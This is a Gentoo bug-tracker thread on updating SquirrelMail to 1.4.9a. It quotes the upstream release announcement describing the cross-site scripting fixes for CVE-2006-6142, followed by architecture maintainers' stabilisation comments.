Comment 1 Stefan Cornelius (RETIRED) 2006-12-03 03:51:35 UTC

thanks for filing this, eraidcator please provide new packages blablaa (guess you already know that ;)

Comment 2 Rajiv Aaron Manglani (RETIRED) 2006-12-03 18:09:34 UTC

From: 	  marc@squirrelmail.org
Subject: 	[SM-ANNOUNCE] SquirrelMail 1.4.9a Released
Date: 	December 3, 2006 8:25:21 PM EST
To: 	  squirrelmail-announce@lists.sourceforge.net
Cc: 	  squirrelmail-devel@lists.sourceforge.net, squirrelmail-users@lists.sourceforge.net, squirrelmail-plugins@lists.sourceforge.net

Hello All,

The SquirrelMail Project Team is proud to announce the release of
SquirrelMail 1.4.9a. This version is a security release.

The day after we released SquirrelMail 1.4.9 new cross site scripting
issues were reported and immediately fixed. Therefor the decision to
release 1.4.9a so short after the 1.4.9 release.

1.4.9 and 1.4.9a is addressing
the following problems since 1.4.8:
- Some security fixes (see below)
- Small enhancements
- A collection of bugfixes (see ChangeLog)

Security issues
===============
This release addresses security issues found since the release of 1.4.8:

Cross site scripting via malicious input the mailto parameter of
webmail.php, the session and delete_draft parameters of compose.php and
via a shortcoming in the magicHTML filter.

This is CVE-2006-6142. Thanks for Martijn Brinkers for his continued research
that uncovered these issues.

We've also changed SquirrelMail attachment handling to work around an issue
in Internet Explorer: the browser will attempt to guess the MIME type of
attachments based on content, not the MIME header we send. Attachments could
fake to be an 'harmless' image/jpeg, while they were in fact HTML that
Internet Explorer would render.

After release 1.4.9 Martijn Brinkers again discovered new cross site
scripting issues in the magicHtml filter. The new discovered security issues
have to do with the wide intepretation of the words expression and url by IE
browsers. As second issue Martijn Brinkers that the @import statement in
stylesheets could be misused.

Further details on SquirrelMail vulnerabilities can be found at the
following address:

  http://www.squirrelmail.org/security/


Package md5sums
===============

3adf66bfe2e816ba8375cf811d8ef3f6 squirrelmail-1.4.9a.tar.bz2
5b19f8cc5badef91d1f2410df41564bc squirrelmail-1.4.9a.tar.gz
a9e108418b0a42763a1d29a267fa7168 squirrelmail-1.4.9a.zip


Download at:

  http://www.squirrelmail.org/download.php

Happy SquirrelMailing!

-- 
Marc Groot Koerkamp
SquirrelMail Project Team

Comment 3 Andrej Kacian (RETIRED) 2006-12-10 07:54:57 UTC

As Jeremy is still MIA, I took the liberty of bumping squirrelmail to 1.4.9a.

I have also marked it stable on x86, as I only tested it on a stable box, where I have a working squirrelmail installation.

Arches,

test and mark mail-client/squirrelmail-1.4.9a stable if possible please

x86 and sparc already done. Removing.

Comment 6 Tobias Scherbaum (RETIRED) 2006-12-26 23:58:38 UTC

ppc stable

Comment 7 Bryan Østergaard (RETIRED) 2006-12-28 14:14:07 UTC

Stable on Alpha.

Comment 8 Markus Rothe (RETIRED) 2006-12-30 04:59:21 UTC

ppc64 stable

Comment 9 Steve Dibb (RETIRED) 2007-01-23 10:00:49 UTC

amd64 stable

Comment 10 Raphael Marichez (Falco) (RETIRED) 2007-02-10 19:17:44 UTC

I vote no

Comment 11 Raphael Marichez (Falco) (RETIRED) 2007-02-12 22:36:02 UTC

i'm actually the only active member of the security team, so let's close this without GLSA. Feel free to reopen if you disagree.

Comment 12 Jeremy Huddleston (RETIRED) 2007-05-21 17:17:51 UTC

This was marked as closed but was never fixed for ~arch.  1.5.1-r4 contains the fix.